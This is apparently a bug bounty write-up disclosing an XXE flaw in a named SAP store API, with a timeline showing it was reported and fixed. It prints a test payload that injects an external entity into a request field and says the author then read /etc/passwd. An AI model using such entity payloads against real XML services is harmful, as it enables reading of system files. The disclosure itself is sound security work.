An interesting XXE in SAP.

Hello Folks!

Let me introduce myself to the community. I’m Zain Sabahat, a Security Researcher and Bug Bounty Hunter from Pakistan. Since I have learned a lot of stuff from reading write-ups I have decided to play my role in giving back to the community. I will be disclosing some of my best findings in a series of write-ups.

Today I will be disclosing about an XXE — XML External Entity vulnerability I discovered in SAP’s subdomain https://store.sap.com

During my recon, I came across a store subdomain. When I opened https://store.sap.com it redirected me to the https://store.sap.com/sap/cpa/ui/resources/store/html/StoreFront.html During the loading of that page, a set of GET and POST requests were passed. One of the POST request to /sap/cpa/api/getSolutionsendpoint caught my attention.

I manipulated the POST data to :

<!DOCTYPE foo [<!ENTITY xxe SYSTEM “Zain Here”> ]><SolutionListRequest><Facets><FacetType><Code/><Value/></FacetType></Facets><ListingType>2</ListingType><CountryCode>US</CountryCode><RetrieveAllDetailsIndicator>1</RetrieveAllDetailsIndicator><RetrieveFacetsIndicator/><RowCount>24&xxe;</RowCount><RowIndex>1</RowIndex><SearchText/><SolutionGroup/><SolutionTypeIndicator/><CategoryID/><RecommenderPageIndicator/><ResellerID/><ShoppingCartID/><CompanyID/><EndCustomerAddressID/><UserRoleCode/></SolutionListRequest>

in order to check if it was vulnerable to XXE or not.

Verified the presence of XXE

When I saw my name printed out in response I got very happy and decided to exploit it further. I crafted the POST request in order to print out the contents of “/etc/passwd/” file.

Successfully printed out /etc/passwd file

Timeline:

Jun 26, 2017 — Reported to SAP.

Jul 17, 2017 — Triaged.

Feb 13, 2018 — Fixed.

April 10, 2018 — Added to Hall Of Fame.

It took them almost a year to fix because that bug was in their internal component which was hard to replace.

Thanks for reading! Stay tuned for more write-ups!